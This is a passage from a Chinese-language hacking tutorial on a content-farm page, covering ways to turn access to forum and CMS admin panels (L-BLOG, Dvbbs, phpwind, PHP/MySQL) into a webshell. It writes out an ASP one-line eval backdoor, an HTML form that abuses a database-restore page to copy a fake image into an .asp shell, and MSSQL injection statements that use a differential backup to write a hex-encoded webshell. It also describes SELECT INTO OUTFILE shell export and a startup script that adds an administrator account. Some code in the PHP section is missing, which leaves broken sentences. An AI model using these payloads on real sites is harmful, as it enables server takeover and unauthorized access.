六、利用數(shù)據(jù)庫壓縮功能
可以將數(shù)據(jù)的防下載失效從而使插入數(shù)據(jù)庫的最小馬成功運行，比較典型的就是loveyuki的L-BLOG，在友情添加的url出寫上＜%eval request (chr(35))%＞, 提交后，在數(shù)據(jù)庫操作中壓縮數(shù)據(jù)庫，可以成功壓縮出.asp文件，用海洋的最小馬的eval客戶端連就得到一個webshell 。
七、asp mssql系統(tǒng)
這里需要提一點動網(wǎng)mssql版，但是可以直接本地提交來備份的 。首先在發(fā)帖那上傳一個寫有asp代碼的假圖片，然后記住其上傳路徑 。寫一個本地提交的表單，代碼如下：
＜form action=http://網(wǎng)站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post"＞
＜p＞已上傳文件的位置：＜input name="Dbpath" type="text" size="80"＞＜/p＞
＜p＞要復(fù)制到的位置：＜input name="backpath" type="text" size="80"＞＜/p＞
＜p＞＜input type="submit" value="https://www.rkxy.com.cn/dnjc/提交"＞＜/p＞ ＜/form＞
另存為.htm本地執(zhí)行 。把假圖片上傳路徑填在“已上傳文件的位置”那里，想要備份的WebShell的相對路徑填寫在“要復(fù)制到的位置”那里，提交就得到我們可愛的WebShell了，恢復(fù)代碼和此類似，修改相關(guān)地方就可以了 。沒有遇到過后臺執(zhí)行mssql命令比較強大的asp程序后臺，動網(wǎng)的數(shù)據(jù)庫還原和備份是個擺設(shè)，不能執(zhí)行sql命令備份webshell，只能執(zhí)行一些簡單的查詢命令 。可以利用mssql注入差異備份webshell，一般后臺是顯示了絕對路徑，只要有了注入點基本上就可以差異備份成功 。下面是差異備份的主要語句代碼，利用動網(wǎng)7.0的注入漏洞可以用差異備份一個webshell，可以用利用上面提到的方法，將conn.asp文件備份成.txt文件而獲得庫名 。
差異備份的主要代碼：
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--
;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--
;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--
;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--
這段代碼中，0x626273是要備份的庫名bbs的十六進制，可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是＜%execute request("l")%＞的十六進制，是lp最小馬；0x643A5C7765625C312E617370是d:web1.asp的十六進制,也就是你要備份的webshell路徑 。當然也可以用比較常見備份方式來獲得webshell，唯一的不足就是備份后的文件過大，如果備份數(shù)據(jù)庫中有防下載的的數(shù)據(jù)表，或者有錯誤的asp代碼，備份出來的webshell就不會成功運行，利用差異備份是成功率比較高的方法，并且極大的減少備份文件的大小 。
八、php mysql系統(tǒng)
后臺需要有mysql數(shù)據(jù)查詢功能,我們就可以利用它執(zhí)行SELECT ... INTO OUTFILE查詢輸出php文件，因為所有的數(shù)據(jù)是存放在mysql里的，所以我們可以通過正常手段把我們的webshell代碼插入mysql在利用SELECT ... INTO OUTFILE語句導(dǎo)出shell 。
就可以暴出路徑，php環(huán)境中比較容易暴出絕對路徑：） 。提一點的是遇到是mysql在win系統(tǒng)下路徑應(yīng)該這樣寫 。下面的方法是比較常用的一個導(dǎo)出webshell的方法，也可以寫個vbs添加系統(tǒng)管理員的腳本導(dǎo)出到啟動文件夾，系統(tǒng)重起后就會添加一個管理員帳號
就會在up目錄下生成文件名為saiy.php內(nèi)容為的最小php木馬， 最后用lanker的客戶端來連接 。實際運用中要考慮到文件夾是否有寫權(quán)限 ?；蛘咻斎脒@樣的代碼 將會在當前目錄生成一個a.php的最小馬 。
九、phpwind論壇從后臺到webshell的三種方式
方式1 模板法
進入后臺， 風格模版設(shè)置 ，在隨便一行寫代碼，記住，這代碼必須頂著左邊行寫，代碼前面不可以有任何字符 。

推薦閱讀

• 

  2021年組裝電腦最佳配置清單 組裝電腦高配置清單
• 

  學(xué)生提高初三英語成績的技巧
• 

  vivoipooneo支持多少充電
• 

  湯圓能不能煎著吃
• 

  螺絲怎么炒
• 

  太空儀小制作的原理 如何制作？
• 

  清明前后小麥打什么藥
• 

  煎鱈魚怎么做好吃又簡單
• 

  黑悟空在哪一集出現(xiàn) 黑悟空在哪一集出現(xiàn)的
• 

  2022肇慶夢幻奇趣園國慶活動
• 

  分享三星W2018刪除三星賬戶的操作步驟。
• 

  完美紅顏選什么職業(yè),頁游完美紅顏職業(yè)
• 

  海洋科學(xué)，大學(xué)中海洋科學(xué)類專業(yè)怎么樣
• 

  冬天孕婦應(yīng)該注意什么 冬季孕婦養(yǎng)生小常識 注意衣著飲食進補
• 

  手部護理│女人臉美還不夠，手白手嫩更加分
• 

  尼康微單為什么不采用單反鏡頭,想添微單做配機

• 上下班打卡機怎么計算
• ps可以干什么
• 從中國到美國坐飛機要多久時間
• 馬鈴薯防小葉病要點
• 簡評588
• 防毒防盜 從系統(tǒng)注冊表開刀
• iphone11后臺怎么關(guān)
• 美團閃付從哪里扣款
• 凌遲處死是什么意思
• 京瓷KZF520小評